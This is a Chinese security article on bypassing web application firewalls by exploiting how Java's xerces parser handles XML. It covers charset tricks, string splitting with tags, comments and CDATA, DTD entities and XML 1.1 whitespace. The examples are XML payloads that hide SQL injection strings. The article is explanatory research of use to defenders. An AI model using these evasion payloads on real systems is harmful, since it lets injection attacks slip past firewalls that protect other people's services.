WAF Bypass之xerces解析-安全KER

JAVA的XML解析，底层用的是xerces，而xml本身的特性及xerces的一些特性，可以用来造成WAF与后台代码的解析不一致。

文章是在看完代码后的三个月写的，所以并没有尝试把所有绕过手法的代码逻辑点列出。

1. Charset

1.1 Magic Charset

XML文档可以通过头部标签声明版本与字符集，常见的有UTF-8、GBK、ISO-8859-1。

JAVA的底层XML解析库xerces在在读取XML文档时，首先会根据XML文档的头4个字节选择对应的字符流Reader来读取XML文档，如果XML文档有XML标签头，该Reader只是用于读取XML标签头，后续的XML内容选用什么字符流Reader则会另外根据XML标签头来决定；如果XML文档没有标签头，则该Reader将会用于读取整个XML文档。

根据XML文档头4个字节选择字符流读取器的关键代码位于 jdk1.8.0_191src.zip!comsunorgapachexercesinternalimplXMLEntityManager.java：

判断字符集的getEncodingName方法代码如下，其中UCS-4 2143、UCS-4 3412字最后是会抛异常提示不支持的字符编码。

所以最后看来，我们可以得到下面这个表，而为了方便区分，笔者将该手法称为Magic Charset。

1.2 Declare Charset

如果用户在XML文档的XML头标签中中通过encoding指定了字符集，后续的XML文档读取将会根据该属性值选择一个字符流读取器。

最后设置Reader的关键代码位于

jdk1.8.0_191src.zip!comsunorgapachexercesinternalimplXMLDocumentFragmentScannerImpl.java

jdk1.8.0_191src.zip!comsunorgapachexercesinternalimplXMLEntityScanner.java

在这里，我们还另外需要关注一下createReader中的EncodingMap，这里对字符集名称做了别名的映射，如IBM037与CP037实际上是同一个字符集。

jdk1.8.0_191src.zip!comsunorgapachexercesinternalutilEncodingMap.java：

1.3 Double Charset

由于magic charset与declare charset的逻辑是独立的，我们可以分别对XML头标签与XML内容使用不同的编码。

2. String Split

2.1 LABEL INSERT

<?xml version="1.0" encoding="UTF-8"?>
<root>
<test att="foo">" union select 1 -- -</test>
</root>

添加额外标签进行字符串分割：

<?xml version="1.0" encoding="UTF-8"?>
<root>
<test att="foo">" uni<foo>foo1 foo2</foo><foofoo/>on select 1 -- -</test>
</root>

使用注释进行字符串分割：

<?xml version="1.0" encoding="UTF-8"?>
<root>
<test att="foo">" uni<!--foo-->on select 1 -- -</test>
</root>

使用PI标签进行字符串分割：

<?xml version="1.0" encoding="UTF-8"?>
<root>
<test att="foo">" uni<?foo1 foo2 ?>on select 1 -- -</test>
</root>

jdk1.8.0_191src.zip!comsunorgapachexercesinternalimplXMLDocumentScannerImpl.java：

2.2 CDATA

使用CDATA标签进行字符串分割：

<?xml version="1.0" encoding="UTF-8"?>
<root>
<test att="foo">" uni<![CDATA[o]]>n select 1 -- -</test>
</root>

3. DTD

值得注意的是，xstream默认关闭DTD；XMLDecoder虽然没有关闭，但是对于Weblogic XMLDecoder，由于其特色的解析流程，对于Weblogic XMLDecoder是无法利用的。

这里不贴代码了，有的是来源RFC，而且代码是三个月前看的，不想找啊。

3.1 ATTLIST

标签的属性与值，可以通过DTD进行定义，原始XML文档：

<?xml version="1.1" encoding="ISO-8859-1" ?>
<root>
<test att="foo"></test>
</root>

使用DTD ATTLIST，写作：

<?xml version="1.1" encoding="ISO-8859-1" ?>
<!DOCTYPE foo [
<!ATTLIST test att CDATA #FIXED "foo">
]>
<root>
<test></test>
</root>

使用HTML编码、CDATA也可以：

<?xml version="1.1" encoding="ISO-8859-1" ?>
<!DOCTYPE foo [
<!ATTLIST test att CDATA #FIXED "<![CDATA[f]]>oo">
]>
<root>
<test></test>
</root>

3.2 local entity

通过在DTD中定义本地实体，可在标签属性值、标签内容、DTD字符串值，这些字符串区域引用。

<?xml version="1.0" encoding="UTF-8"?>
<root>
<test>" union select 1 -- -</test>
</root>

使用本地实体：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY test1 "select">
<!ENTITY test2 "union">
]>
<root>
<test>" &test2; &test1; 1 -- -</test>
</root>

使用HTML编码、CDATA也可以：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY test1 "<![CDATA[el]]>ect">
<!ENTITY test2 "union">
]>
<root>
<test>" &test2; &test1; 1 -- -</test>
</root>

4. XML1.1

4.1 space char

当XML版本被声明为1.1时，XML的解析将支持一些额外的空白字符、控制字符。

jdk1.8.0_191src.zip!comsunorgapachexercesinternalimplXML11EntityScanner.java：

jdk1.8.0_191src.zip!comsunorgapachexercesinternalparsersXML11Configuration.java：

代码中的x85是指码点，而非我们平时所见的unicdoe字符。而x85二进制为‭10000101‬，高位为1，根据笔者认知，UTF-8无法使得8比特码点成为UTF-8字符，因此我们无法在UTF-8中使用它，但在ISO-8859-1、UTF-16等字符集中我们可以使用它：

<?xml version="1.1" encoding="iso-8859-1"?>%85<root%85>foo</root%85>

在UTF-16BE中对应的unicode字符为x00x85：

同样的，x28x20是指码点，其UTF-8编码字符为%E2%80%A8，推导过程如下：

x20 x28转2进制比特：
00100000 00101000
UTF-8中三个字节的编码规范：
1110XXXX 10XXXXXX 10XXXXXX
x20x28转UTF-8的2进制比特：
11100010 10000000 10101000
x20x28的UTF-8编码为:
%E2%80%A8

于是我们可以对XML文档进行如下修改：

<?xml version="1.1" encoding="utf-8"?>%E2%80%A8<root%E2%80%A8>foo</root%E2%80%A8>

结语

除开JAVA外，还有.NET、PHP，而作为XML的子集SOAP，不知SOAP自身是否还有其他特性。

WAF Bypass之xerces解析

译文声明

1. Charset

1.1 Magic Charset

1.2 Declare Charset

1.3 Double Charset

2. String Split

2.1 LABEL INSERT

2.2 CDATA

3. DTD

3.1 ATTLIST

3.2 local entity

4. XML1.1

4.1 space char

结语

发表评论

TA的文章

spring-boot-thymeleaf-ssti

OpenRASP学习笔记

WAF Bypass之webshell上传jsp与tomcat

简析Apache如何解析HTTP请求

WAF Bypass之xerces解析

相关文章

Z0Scan设计与实现：通用插件与分布式扫描新思路

美实名爆料：马斯克领导的DOGE被指入侵劳工机构系统，敏感数据疑遭泄露

ISCC-2025-第22届信息安全与对抗技术竞赛通知

梨子带你刷burpsuite靶场系列之服务器端漏洞篇 - sql注入专题更新部分

梨子带你刷burpsuite靶场系列之客户端漏洞篇 - 跨站脚本(XSS)及跨站请求伪造(CSRF)专题更新部分

「奇御」AI.安全技术沙龙 · 3月29日北京开启！

记一所中学的的SQL报错注入

热门推荐